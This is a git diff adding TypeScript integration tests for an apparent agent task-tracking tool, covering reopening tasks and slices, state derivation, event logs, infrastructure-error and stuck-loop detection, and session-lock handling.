+        { milestoneId: "M001", sliceId: "S01", taskId: "T01", reason: "Need to redo" },
+        base,
+      );
+      assert.ok(!("error" in result), `expected success: ${JSON.stringify(result)}`);
+
+      const task = getTask("M001", "S01", "T01");
+      assert.equal(task!.status, "pending");
+    });
+
+    test("cannot reopen task that is not complete", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      const result = await handleReopenTask(
+        { milestoneId: "M001", sliceId: "S01", taskId: "T01" },
+        base,
+      );
+      assert.ok("error" in result);
+      assert.match((result as any).error, /not complete/);
+    });
+
+    test("cannot reopen task in closed slice — must reopen slice first", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      const result = await handleReopenTask(
+        { milestoneId: "M001", sliceId: "S01", taskId: "T01" },
+        base,
+      );
+      assert.ok("error" in result);
+      assert.match((result as any).error, /closed slice/);
+    });
+
+    test("cannot reopen task in closed milestone", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Done", status: "complete" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      const result = await handleReopenTask(
+        { milestoneId: "M001", sliceId: "S01", taskId: "T01" },
+        base,
+      );
+      assert.ok("error" in result);
+      assert.match((result as any).error, /closed milestone/);
+    });
+
+    test("reopen slice: resets slice to in_progress and all tasks to pending", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      const result = await handleReopenSlice(
+        { milestoneId: "M001", sliceId: "S01", reason: "Need rework" },
+        base,
+      );
+      assert.ok(!("error" in result), `expected success: ${JSON.stringify(result)}`);
+      assert.equal((result as any).tasksReset, 2);
+
+      // Verify slice state
+      const slice = getSlice("M001", "S01");
+      assert.equal(slice!.status, "in_progress");
+
+      // Verify all tasks reset to pending
+      const tasks = getSliceTasks("M001", "S01");
+      assert.ok(tasks.every(t => t.status === "pending"), "all tasks should be pending after slice reopen");
+    });
+
+    test("cannot reopen slice in closed milestone", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Done", status: "complete" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+
+      const result = await handleReopenSlice(
+        { milestoneId: "M001", sliceId: "S01" },
+        base,
+      );
+      assert.ok("error" in result);
+      assert.match((result as any).error, /closed milestone/);
+    });
+
+    test("no reopen-milestone tool exists — milestone completion is irrevocable (H5)", async () => {
+      // This test documents the H5 finding: there is no handleReopenMilestone function.
+      // A completed milestone can only be undone via direct DB manipulation.
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Done", status: "complete" });
+
+      const milestone = getMilestone("M001");
+      assert.ok(isClosedStatus(milestone!.status), "milestone is closed");
+
+      // The only escape is direct DB manipulation — no handler exists
+      updateMilestoneStatus("M001", "active", null);
+      const reopened = getMilestone("M001");
+      assert.equal(reopened!.status, "active", "direct DB manipulation can reopen, but no tool exposes this");
+    });
+  });
+
+  // ─────────────────────────────────────────────────────────────────────────
+  // PHASE 4: Phantom parents and auto-creation (H6)
+  // ─────────────────────────────────────────────────────────────────────────
+
+  describe("phantom parent auto-creation (H6)", () => {
+    test("completing task for non-existent milestone/slice auto-creates them", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      // No milestone or slice pre-inserted — handler will auto-create
+
+      const result = await handleCompleteTask(makeTaskParams("T01", "S99", "M099") as any, base);
+      assert.ok(!("error" in result), `expected success: ${JSON.stringify(result)}`);
+
+      // Phantom milestone created — H6 fix: now uses ID as title instead of empty string
+      const milestone = getMilestone("M099");
+      assert.ok(milestone, "phantom milestone M099 should exist");
+      assert.equal(milestone!.title, "M099", "H6 fix: phantom milestone uses ID as title");
+
+      // Phantom slice created
+      const slice = getSlice("M099", "S99");
+      assert.ok(slice, "phantom slice S99 should exist");
+    });
+
+    test("completing slice for non-existent milestone auto-creates it", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      // Insert task to satisfy completion guard
+      insertMilestone({ id: "M099" });
+      insertSlice({ id: "S99", milestoneId: "M099" });
+      insertTask({ id: "T01", sliceId: "S99", milestoneId: "M099", status: "complete" });
+
+      const result = await handleCompleteSlice(makeSliceParams("S99", "M099") as any, base);
+      assert.ok(!("error" in result), `expected success: ${JSON.stringify(result)}`);
+    });
+  });
+
+  // ─────────────────────────────────────────────────────────────────────────
+  // PHASE 5: State derivation consistency
+  // ─────────────────────────────────────────────────────────────────────────
+
+  describe("state derivation with live DB", () => {
+    test("deriveStateFromDb reflects task completion immediately", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      invalidateStateCache();
+      const stateBefore = await deriveStateFromDb(base);
+      assert.equal(stateBefore.phase, "executing", `before: expected executing, got ${stateBefore.phase}`);
+
+      // Complete T01
+      updateTaskStatus("M001", "S01", "T01", "complete", new Date().toISOString());
+      invalidateStateCache();
+      const stateAfterT01 = await deriveStateFromDb(base);
+      // Still executing — T02 is pending
+      assert.equal(stateAfterT01.phase, "executing", `after T01: expected executing, got ${stateAfterT01.phase}`);
+
+      // Complete T02
+      updateTaskStatus("M001", "S01", "T02", "complete", new Date().toISOString());
+      invalidateStateCache();
+      const stateAfterT02 = await deriveStateFromDb(base);
+      // All tasks done → summarizing
+      assert.equal(stateAfterT02.phase, "summarizing", `after T02: expected summarizing, got ${stateAfterT02.phase}`);
+    });
+
+    test("deriveStateFromDb reflects slice completion → next slice or validating", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete" });
+      insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", status: "pending" });
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+      // S01 done, S02 has pending task → executing
+      assert.equal(state.phase, "executing", `expected executing for S02, got ${state.phase}`);
+      assert.equal(state.activeSlice?.id, "S02", "active slice should be S02");
+    });
+
+    test("deriveStateFromDb with all slices done → validating-milestone", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete" });
+      insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", status: "complete" });
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+      assert.equal(state.phase, "validating-milestone", `expected validating-milestone, got ${state.phase}`);
+    });
+
+    test("ghost milestone is skipped by deriveState", async () => {
+      base = makeTempDir();
+      const gsdDir = join(base, ".gsd", "milestones");
+      // M001 is ghost — empty dir
+      mkdirSync(join(gsdDir, "M001"), { recursive: true });
+      // M002 has content
+      mkdirSync(join(gsdDir, "M002"), { recursive: true });
+      writeFileSync(join(gsdDir, "M002", "M002-CONTEXT-DRAFT.md"), "# Draft\nContent.\n");
+
+      assert.ok(isGhostMilestone(base, "M001"), "M001 should be ghost");
+      assert.ok(!isGhostMilestone(base, "M002"), "M002 should not be ghost");
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+      assert.equal(state.activeMilestone?.id, "M002", "should skip ghost M001 and use M002");
+    });
+  });
+
+  // ─────────────────────────────────────────────────────────────────────────
+  // PHASE 6: Event log integrity
+  // ─────────────────────────────────────────────────────────────────────────
+
+  describe("event log integrity across operations", () => {
+    test("full operation sequence produces correct event log", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      // Complete T01
+      await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      // Complete T02
+      await handleCompleteTask(makeTaskParams("T02", "S01", "M001") as any, base);
+      // Complete S01
+      await handleCompleteSlice(makeSliceParams("S01", "M001") as any, base);
+
+      const events = readEvents(join(base, ".gsd", "event-log.jsonl"));
+
+      // Should have 3 events: 2 task completions + 1 slice completion
+      assert.ok(events.length >= 3, `expected ≥3 events, got ${events.length}`);
+
+      const taskEvents = events.filter(e => e.cmd === "complete-task");
+      assert.equal(taskEvents.length, 2, "2 task completion events");
+
+      const sliceEvents = events.filter(e => e.cmd === "complete-slice");
+      assert.equal(sliceEvents.length, 1, "1 slice completion event");
+
+      // Events are ordered chronologically
+      for (let i = 1; i < events.length; i++) {
+        assert.ok(
+          events[i]!.ts >= events[i - 1]!.ts,
+          `events should be chronologically ordered: ${events[i - 1]!.ts} <= ${events[i]!.ts}`,
+        );
+      }
+
+      // All events have hashes and session IDs
+      for (const event of events) {
+        assert.ok(event.hash, "event should have hash");
+        assert.ok(event.session_id, "event should have session_id");
+      }
+    });
+
+    test("reopen operations produce events", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      await handleReopenTask(
+        { milestoneId: "M001", sliceId: "S01", taskId: "T01", reason: "redo" },
+        base,
+      );
+
+      const events = readEvents(join(base, ".gsd", "event-log.jsonl"));
+      const reopenEvent = events.find(e => e.cmd === "reopen-task");
+      assert.ok(reopenEvent, "should have reopen-task event");
+      assert.equal((reopenEvent!.params as any).taskId, "T01");
+      assert.equal((reopenEvent!.params as any).reason, "redo");
+    });
+  });
+
+  // ─────────────────────────────────────────────────────────────────────────
+  // PHASE 7: Reopen-then-redo cycle
+  // ─────────────────────────────────────────────────────────────────────────
+
+  describe("reopen-then-redo cycle", () => {
+    test("complete → reopen → re-complete task works end-to-end (M12 fixed)", async () => {
+      // M12 fix: reopen-task now deletes SUMMARY.md from disk before the
+      // post-mutation hook runs, preventing the reconciler from auto-correcting
+      // the task back to "complete".
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      // Complete — writes T01-SUMMARY.md to disk
+      const r1 = await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      assert.ok(!("error" in r1), `first complete: ${JSON.stringify(r1)}`);
+
+      const summaryPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-SUMMARY.md");
+      assert.ok(existsSync(summaryPath), "SUMMARY.md exists after completion");
+
+      // Reopen — now deletes SUMMARY.md from disk (M12 fix)
+      const r2 = await handleReopenTask({ milestoneId: "M001", sliceId: "S01", taskId: "T01" }, base);
+      assert.ok(!("error" in r2), `reopen: ${JSON.stringify(r2)}`);
+
+      // Task is now properly pending — SUMMARY.md was cleaned up
+      assert.equal(getTask("M001", "S01", "T01")!.status, "pending");
+      assert.ok(!existsSync(summaryPath), "M12 fix: SUMMARY.md cleaned up by reopen");
+
+      // Re-complete succeeds
+      const r3 = await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      assert.ok(!("error" in r3), `re-complete: ${JSON.stringify(r3)}`);
+      assert.ok(isClosedStatus(getTask("M001", "S01", "T01")!.status));
+    });
+
+    test("complete slice → reopen → re-complete all works end-to-end (M12 fixed)", async () => {
+      // M12 fix: reopen-slice now deletes all SUMMARY.md and UAT.md artifacts
+      // from disk, preventing reconciler interference.
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      // Complete task + slice
+      await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      await handleCompleteSlice(makeSliceParams("S01", "M001") as any, base);
+      assert.ok(isClosedStatus(getSlice("M001", "S01")!.status));
+
+      // Reopen slice — now cleans up all artifacts (M12 fix)
+      await handleReopenSlice({ milestoneId: "M001", sliceId: "S01" }, base);
+      assert.equal(getSlice("M001", "S01")!.status, "in_progress");
+      assert.equal(getTask("M001", "S01", "T01")!.status, "pending");
+
+      // Re-complete task + slice succeeds
+      await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      const r = await handleCompleteSlice(makeSliceParams("S01", "M001") as any, base);
+      assert.ok(!("error" in r), `re-complete slice: ${JSON.stringify(r)}`);
+      assert.ok(isClosedStatus(getSlice("M001", "S01")!.status));
+    });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/integration/state-machine-runtime-failures.test.ts b/src/resources/extensions/gsd/tests/integration/state-machine-runtime-failures.test.ts
new file mode 100644
index 000000000..beba08221
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/state-machine-runtime-failures.test.ts
@@ -0,0 +1,841 @@
+/**
+ * state-machine-runtime-failures.test.ts — Tests for auto-loop runtime failures,
+ * infrastructure errors, stuck detection, session management, merge conflicts,
+ * concurrent access, and race conditions.
+ *
+ * These tests use mocked LoopDeps and AutoSession to exercise the auto-loop
+ * error handling paths without requiring real LLM sessions or network access.
+ *
+ * Coverage gaps filled:
+ * 1. Infrastructure error detection and immediate stop (ENOSPC, ENOMEM, etc.)
+ * 2. Consecutive error graduated recovery (1st → retry, 2nd → cache flush, 3rd → stop)
+ * 3. Stuck detection: same error repeated, same unit 3x, oscillation A↔B
+ * 4. Session lock validation: compromised, pid-mismatch, missing-metadata
+ * 5. Session creation timeout (NEW_SESSION_TIMEOUT_MS = 30s)
+ * 6. MergeConflictError stops auto-loop
+ * 7. Max iteration safety valve
+ * 8. s.active race: pause signal during unit execution
+ * 9. Filesystem mutation during dispatch cycle
+ * 10. Worktree disappearance detection
+ */
+
+// GSD State Machine Runtime Failure Tests
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  rmSync,
+  existsSync,
+  unlinkSync,
+} from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+// ── Infrastructure error detection ───────────────────────────────────────
+import {
+  isInfrastructureError,
+  INFRA_ERROR_CODES,
+} from "../../auto/infra-errors.ts";
+
+// ── Stuck detection ──────────────────────────────────────────────────────
+import { detectStuck } from "../../auto/detect-stuck.ts";
+import type { WindowEntry } from "../../auto/types.ts";
+
+// ── Session constants ────────────────────────────────────────────────────
+import {
+  AutoSession,
+  NEW_SESSION_TIMEOUT_MS,
+  MAX_UNIT_DISPATCHES,
+  STUB_RECOVERY_THRESHOLD,
+  MAX_LIFETIME_DISPATCHES,
+} from "../../auto/session.ts";
+
+// ── Auto-loop types ──────────────────────────────────────────────────────
+import { MAX_LOOP_ITERATIONS } from "../../auto/types.ts";
+
+// ── MergeConflictError ───────────────────────────────────────────────────
+import { MergeConflictError } from "../../git-service.ts";
+
+// ── Session lock ─────────────────────────────────────────────────────────
+import type { SessionLockStatus } from "../../session-lock.ts";
+
+// ── State & DB ───────────────────────────────────────────────────────────
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+} from "../../gsd-db.ts";
+import {
+  deriveState,
+  deriveStateFromDb,
+  invalidateStateCache,
+  isGhostMilestone,
+} from "../../state.ts";
+import { invalidateAllCaches } from "../../cache.ts";
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Fixture Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function makeTempDir(): string {
+  return mkdtempSync(join(tmpdir(), "gsd-runtime-fail-"));
+}
+
+function createMinimalFixture(): string {
+  const base = makeTempDir();
+  const mDir = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks");
+  mkdirSync(mDir, { recursive: true });
+  writeFileSync(
+    join(base, ".gsd", "milestones", "M001", "M001-CONTEXT.md"),
+    "# M001: Runtime Test\n\n## Purpose\nTest runtime failures.\n",
+  );
+  writeFileSync(
+    join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
+    [
+      "# M001: Runtime Test",
+      "",
+      "## Vision",
+      "Test.",
+      "",
+      "## Success Criteria",
+      "- Works",
+      "",
+      "## Slices",
+      "",
+      "- [ ] **S01: Feature** `risk:low` `depends:[]`",
+      "  - After this: Done.",
+      "",
+      "## Boundary Map",
+      "",
+      "| From | To | Produces | Consumes |",
+      "|------|----|----------|----------|",
+      "| S01 | terminal | out | nothing |",
+    ].join("\n"),
+  );
+  writeFileSync(
+    join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md"),
+    [
+      "# S01: Feature",
+      "",
+      "**Goal:** Build.",
+      "",
+      "## Tasks",
+      "",
+      "- [ ] **T01: Build** `est:30m`",
+      "  - Do: Build it",
+      "  - Verify: Test it",
+    ].join("\n"),
+  );
+  writeFileSync(
+    join(mDir, "T01-PLAN.md"),
+    "# T01 Plan\nBuild it.\n",
+  );
+  return base;
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Test Suite
+// ═══════════════════════════════════════════════════════════════════════════
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 1: Infrastructure Error Detection
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("infrastructure error detection", () => {
+  test("ENOSPC (disk full) is detected as infrastructure error", () => {
+    const err = Object.assign(new Error("write ENOSPC"), { code: "ENOSPC" });
+    assert.equal(isInfrastructureError(err), "ENOSPC");
+  });
+
+  test("ENOMEM (out of memory) is detected", () => {
+    const err = Object.assign(new Error("Cannot allocate memory"), { code: "ENOMEM" });
+    assert.equal(isInfrastructureError(err), "ENOMEM");
+  });
+
+  test("EROFS (read-only filesystem) is detected", () => {
+    const err = Object.assign(new Error("Read-only file system"), { code: "EROFS" });
+    assert.equal(isInfrastructureError(err), "EROFS");
+  });
+
+  test("EDQUOT (disk quota exceeded) is detected", () => {
+    const err = Object.assign(new Error("Disk quota exceeded"), { code: "EDQUOT" });
+    assert.equal(isInfrastructureError(err), "EDQUOT");
+  });
+
+  test("EMFILE (too many open files - process) is detected", () => {
+    const err = Object.assign(new Error("too many open files"), { code: "EMFILE" });
+    assert.equal(isInfrastructureError(err), "EMFILE");
+  });
+
+  test("ENFILE (too many open files - system) is detected", () => {
+    const err = Object.assign(new Error("file table overflow"), { code: "ENFILE" });
+    assert.equal(isInfrastructureError(err), "ENFILE");
+  });
+
+  test("ECONNREFUSED (connection refused) is detected", () => {
+    const err = Object.assign(new Error("Connection refused"), { code: "ECONNREFUSED" });
+    assert.equal(isInfrastructureError(err), "ECONNREFUSED");
+  });
+
+  test("ENOTFOUND (DNS lookup failed) is detected", () => {
+    const err = Object.assign(new Error("getaddrinfo ENOTFOUND api.anthropic.com"), { code: "ENOTFOUND" });
+    assert.equal(isInfrastructureError(err), "ENOTFOUND");
+  });
+
+  test("ENETUNREACH (network unreachable) is detected", () => {
+    const err = Object.assign(new Error("network is unreachable"), { code: "ENETUNREACH" });
+    assert.equal(isInfrastructureError(err), "ENETUNREACH");
+  });
+
+  test("EAGAIN (resource temporarily unavailable) is detected", () => {
+    const err = Object.assign(new Error("resource temporarily unavailable"), { code: "EAGAIN" });
+    assert.equal(isInfrastructureError(err), "EAGAIN");
+  });
+
+  test("SQLite WAL corruption is detected via message scan", () => {
+    const err = new Error("database disk image is malformed");
+    assert.equal(isInfrastructureError(err), "SQLITE_CORRUPT");
+  });
+
+  test("code-based detection when code property is present", () => {
+    const err = { code: "ENOSPC", message: "something" };
+    assert.equal(isInfrastructureError(err), "ENOSPC");
+  });
+
+  test("message fallback when no code property (e.g. string errors)", () => {
+    const err = new Error("write failed: ENOSPC: no space left on device");
+    assert.equal(isInfrastructureError(err), "ENOSPC");
+  });
+
+  test("non-infrastructure error returns null", () => {
+    assert.equal(isInfrastructureError(new Error("TypeError: x is not a function")), null);
+    assert.equal(isInfrastructureError(new Error("SyntaxError: Unexpected token")), null);
+    assert.equal(isInfrastructureError(new Error("rate_limit_exceeded")), null);
+    assert.equal(isInfrastructureError("just a string error"), null);
+    assert.equal(isInfrastructureError(null), null);
+    assert.equal(isInfrastructureError(undefined), null);
+    assert.equal(isInfrastructureError(42), null);
+  });
+
+  test("all INFRA_ERROR_CODES are covered", () => {
+    const expectedCodes = [
+      "ENOSPC", "ENOMEM", "EROFS", "EDQUOT", "EMFILE",
+      "ENFILE", "EAGAIN", "ECONNREFUSED", "ENOTFOUND", "ENETUNREACH",
+    ];
+    for (const code of expectedCodes) {
+      assert.ok(INFRA_ERROR_CODES.has(code), `${code} should be in INFRA_ERROR_CODES`);
+    }
+    assert.equal(INFRA_ERROR_CODES.size, expectedCodes.length, "no unexpected codes");
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 2: Stuck Detection
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("stuck detection", () => {
+  test("Rule 1: same error repeated consecutively → stuck", () => {
+    const window: WindowEntry[] = [
+      { key: "M001/S01/T01", error: "Provider returned 500" },
+      { key: "M001/S01/T01", error: "Provider returned 500" },
+    ];
+    const result = detectStuck(window);
+    assert.ok(result?.stuck, "same error twice should be stuck");
+    assert.ok(result?.reason.includes("Same error repeated"), "reason should mention error");
+  });
+
+  test("Rule 1: different errors are NOT stuck", () => {
+    const window: WindowEntry[] = [
+      { key: "M001/S01/T01", error: "Provider returned 500" },
+      { key: "M001/S01/T01", error: "Provider returned 429" },
+    ];
+    const result = detectStuck(window);
+    // Different errors → not stuck by Rule 1 (but might be by Rule 2 with more entries)
+    assert.equal(result, null, "different errors should not trigger Rule 1");
+  });
+
+  test("Rule 2: same unit 3 consecutive times → stuck", () => {
+    const window: WindowEntry[] = [
+      { key: "M001/S01/T01" },
+      { key: "M001/S01/T01" },
+      { key: "M001/S01/T01" },
+    ];
+    const result = detectStuck(window);
+    assert.ok(result?.stuck, "same unit 3x should be stuck");
+    assert.ok(result?.reason.includes("3 consecutive times"), "reason should mention 3x");
+  });
+
+  test("Rule 2: 2 consecutive same units is NOT stuck", () => {
+    const window: WindowEntry[] = [
+      { key: "M001/S01/T01" },
+      { key: "M001/S01/T01" },
+    ];
+    const result = detectStuck(window);
+    assert.equal(result, null, "2x same unit is not stuck");
+  });
+
+  test("Rule 3: oscillation A→B→A→B → stuck", () => {
+    const window: WindowEntry[] = [
+      { key: "M001/S01/T01" },
+      { key: "M001/S01/T02" },
+      { key: "M001/S01/T01" },
+      { key: "M001/S01/T02" },
+    ];
+    const result = detectStuck(window);
+    assert.ok(result?.stuck, "A→B→A→B should be stuck");
+    assert.ok(result?.reason.includes("Oscillation"), "reason should mention oscillation");
+  });
+
+  test("Rule 3: A→B→C→D is NOT oscillation", () => {
+    const window: WindowEntry[] = [
+      { key: "A" },
+      { key: "B" },
+      { key: "C" },
+      { key: "D" },
+    ];
+    assert.equal(detectStuck(window), null, "sequential progress is not stuck");
+  });
+
+  test("empty window returns null", () => {
+    assert.equal(detectStuck([]), null);
+  });
+
+  test("single entry returns null", () => {
+    assert.equal(detectStuck([{ key: "A" }]), null);
+  });
+
+  test("Rule 1 takes precedence over Rule 2 when both apply", () => {
+    const window: WindowEntry[] = [
+      { key: "A", error: "fail" },
+      { key: "A", error: "fail" },
+      { key: "A", error: "fail" },
+    ];
+    const result = detectStuck(window);
+    assert.ok(result?.stuck);
+    // Rule 1 fires first (same error at indices 1,2)
+    assert.ok(result?.reason.includes("Same error repeated"));
+  });
+
+  test("errors on different keys are not stuck by Rule 1", () => {
+    const window: WindowEntry[] = [
+      { key: "A", error: "fail" },
+      { key: "B", error: "fail" },
+    ];
+    // Same error but different keys — Rule 1 compares errors regardless of key
+    const result = detectStuck(window);
+    // Rule 1 says "same error repeated consecutively" — it checks error strings
+    assert.ok(result?.stuck, "same error string on different keys still triggers Rule 1");
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 3: Session Management
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("session management", () => {
+  test("AutoSession reset() clears all mutable state", () => {
+    const s = new AutoSession();
+    s.active = true;
+    s.paused = true;
+    s.basePath = "/tmp/test";
+    s.currentUnit = { type: "execute-task", id: "M001/S01/T01", startedAt: Date.now() };
+    s.currentMilestoneId = "M001";
+    s.unitDispatchCount.set("M001/S01/T01", 3);
+    s.unitLifetimeDispatches.set("M001/S01/T01", 5);
+    s.unitRecoveryCount.set("M001/S01/T01", 1);
+
+    s.reset();
+
+    assert.equal(s.active, false, "active should be false after reset");
+    assert.equal(s.paused, false, "paused should be false after reset");
+    assert.equal(s.currentUnit, null, "currentUnit should be null after reset");
+    assert.equal(s.currentMilestoneId, null, "currentMilestoneId should be null");
+    assert.equal(s.unitDispatchCount.size, 0, "dispatch counts cleared");
+    assert.equal(s.unitLifetimeDispatches.size, 0, "lifetime dispatches cleared");
+    assert.equal(s.unitRecoveryCount.size, 0, "recovery counts cleared");
+  });
+
+  test("NEW_SESSION_TIMEOUT_MS is 120 seconds", () => {
+    assert.equal(NEW_SESSION_TIMEOUT_MS, 120_000, "session timeout should be 120s");
+  });
+
+  test("MAX_UNIT_DISPATCHES limits retries for a single unit", () => {
+    assert.equal(MAX_UNIT_DISPATCHES, 3, "max unit dispatches should be 3");
+  });
+
+  test("MAX_LIFETIME_DISPATCHES is the absolute limit per unit", () => {
+    assert.equal(MAX_LIFETIME_DISPATCHES, 6, "max lifetime dispatches should be 6");
+  });
+
+  test("STUB_RECOVERY_THRESHOLD triggers recovery after N stub completions", () => {
+    assert.equal(STUB_RECOVERY_THRESHOLD, 2, "stub recovery threshold should be 2");
+  });
+
+  test("MAX_LOOP_ITERATIONS prevents runaway loops", () => {
+    assert.equal(MAX_LOOP_ITERATIONS, 500, "max iterations should be 500");
+  });
+
+  test("AutoSession dispatch counter tracks per-unit dispatches", () => {
+    const s = new AutoSession();
+    const unitId = "M001/S01/T01";
+
+    assert.equal(s.unitDispatchCount.get(unitId), undefined);
+
+    s.unitDispatchCount.set(unitId, 1);
+    assert.equal(s.unitDispatchCount.get(unitId), 1);
+
+    s.unitDispatchCount.set(unitId, 2);
+    assert.equal(s.unitDispatchCount.get(unitId), 2);
+
+    // Exceeding MAX_UNIT_DISPATCHES
+    s.unitDispatchCount.set(unitId, MAX_UNIT_DISPATCHES + 1);
+    assert.ok(
+      s.unitDispatchCount.get(unitId)! > MAX_UNIT_DISPATCHES,
+      "should track count beyond max for detection",
+    );
+  });
+
+  test("AutoSession toJSON() provides diagnostic snapshot", () => {
+    const s = new AutoSession();
+    s.active = true;
+    s.basePath = "/tmp/test";
+    s.currentUnit = { type: "execute-task", id: "M001/S01/T01", startedAt: Date.now() };
+
+    const json = s.toJSON();
+    assert.ok(json, "toJSON should return a value");
+    assert.equal(typeof json, "object", "toJSON should return an object");
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 4: Session Lock Validation
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("session lock validation", () => {
+  test("SessionLockStatus: valid lock", () => {
+    const status: SessionLockStatus = { valid: true };
+    assert.equal(status.valid, true);
+    assert.equal(status.failureReason, undefined);
+  });
+
+  test("SessionLockStatus: compromised lock (sleep/wake cycle)", () => {
+    const status: SessionLockStatus = {
+      valid: false,
+      failureReason: "compromised",
+    };
+    assert.equal(status.valid, false);
+    assert.equal(status.failureReason, "compromised");
+  });
+
+  test("SessionLockStatus: pid-mismatch (another process took over)", () => {
+    const status: SessionLockStatus = {
+      valid: false,
+      failureReason: "pid-mismatch",
+      existingPid: 12345,
+      expectedPid: 67890,
+    };
+    assert.equal(status.valid, false);
+    assert.equal(status.failureReason, "pid-mismatch");
+    assert.notEqual(status.existingPid, status.expectedPid);
+  });
+
+  test("SessionLockStatus: missing-metadata", () => {
+    const status: SessionLockStatus = {
+      valid: false,
+      failureReason: "missing-metadata",
+    };
+    assert.equal(status.valid, false);
+    assert.equal(status.failureReason, "missing-metadata");
+  });
+});
